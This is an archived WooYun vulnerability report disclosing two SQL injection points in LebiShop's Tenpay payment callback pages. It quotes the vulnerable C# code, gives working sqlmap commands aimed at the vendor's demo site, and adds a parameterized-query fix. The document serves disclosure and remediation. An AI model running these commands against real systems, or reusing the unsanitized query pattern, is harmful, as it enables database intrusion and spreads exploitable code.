WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-03-05: Details reported to the vendor, awaiting vendor response
2015-03-10: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-04: Details opened to core white hats and domain experts
2015-05-14: Details opened to regular white hats
2015-05-24: Details opened to intern white hats
2015-06-08: Details made public
LebiShop mall system, latest version: SQL injection (part 2), four locations, demonstrated on the official demo
Injection 1
http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx
Source code as follows
protected void Page_Load(object sender, EventArgs e)
{
    string where = base.Request["out_trade_no"];     // not sanitized
    Lebi_Order model = B_Lebi_Order.GetModel(where);  // follow this call
    if (model == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        ....

public Lebi_Order_Log GetModel(string strWhere)
{
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select top 1 * from [Lebi_Order_Log] ");
    builder.Append(" where " + strWhere);  // strWhere is not sanitized: SQL injection
    Lebi_Order_Log log = new Lebi_Order_Log();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)
    {
        return null;
    }
    if (set.Tables[0].Rows[0]["id"].ToString() != "")
    {
        log.id = int.Parse(set.Tables[0].Rows[0]["id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Order_id"].ToString() != "")
    {
        log.Order_id = int.Parse(set.Tables[0].Rows[0]["Order_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["User_id"].ToString() != "")
    {
        log.User_id = int.Parse(set.Tables[0].Rows[0]["User_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Admin_id"].ToString() != "")
    {
        log.Admin_id = int.Parse(set.Tables[0].Rows[0]["Admin_id"].ToString());
    }
    log.Admin_Name = set.Tables[0].Rows[0]["Admin_Name"].ToString();
    log.Content = set.Tables[0].Rows[0]["Content"].ToString();
    if (set.Tables[0].Rows[0]["Time_Add"].ToString() != "")
    {
        log.Time_Add = DateTime.Parse(set.Tables[0].Rows[0]["Time_Add"].ToString());
    }
    return log;
}
Injection 2
http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx
protected void Page_Load(object sender, EventArgs e)
{
    string where = base.Request["out_trade_no"];     // not sanitized
    Lebi_Order model = B_Lebi_Order.GetModel(where);  // follow this call
    if (model == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        handler.setKey(util.tenpay_key);
        if (handler.isTenpaySign())

public Lebi_Order GetModel(string strWhere)
{
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select top 1 * from [Lebi_Order] ");
    builder.Append(" where " + strWhere);  // injection here
    Lebi_Order order = new Lebi_Order();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)
Injection 1: sqlmap scan
sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10
Injection 2: sqlmap scan
sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10
Fix suggestion: validate and sanitize the parameter before it reaches the query.
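A hardened form of the order lookup, added here as an example and not LebiShop's own code: the handler validates out_trade_no and binds it as a typed SqlParameter instead of handing GetModel a raw WHERE fragment. The column name Order_no, the class name, and the connection string are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Example replacement for the vulnerable lookup (not LebiShop code).
// Assumes [Lebi_Order] has an nvarchar column Order_no holding the trade number.
public static class OrderLookup
{
    // Placeholder; the real value comes from configuration.
    private const string ConnectionString = "<CONNECTION_STRING_PLACEHOLDER>";

    // Returns the matching order row, or null when nothing matches or the
    // input is not a plausible trade number. User input never enters the SQL text.
    public static DataRow FindByTradeNo(string outTradeNo)
    {
        if (string.IsNullOrEmpty(outTradeNo) || outTradeNo.Length > 64)
            return null;

        // Allow-list the character set a trade number can legitimately contain.
        foreach (char c in outTradeNo)
            if (!char.IsLetterOrDigit(c) && c != '-' && c != '_')
                return null;

        const string sql =
            "SELECT TOP 1 * FROM [Lebi_Order] WHERE [Order_no] = @tradeNo";

        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Bound as a typed parameter: a value such as "1>2" is compared
            // as a literal string, not interpreted as part of the WHERE clause.
            cmd.Parameters.Add("@tradeNo", SqlDbType.NVarChar, 64).Value = outTradeNo;

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
                adapter.Fill(table); // opens and closes the connection itself

            return table.Rows.Count == 0 ? null : table.Rows[0];
        }
    }
}
```

The same pattern applies to the Lebi_Order_Log lookup in the first fragment; the `lbsql{` branch, which forwards caller-supplied text into SQLPara, should be closed to request data as well.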
Severity: No impact (vendor ignored)
Ignored at: 2015-06-08 11:17
None yet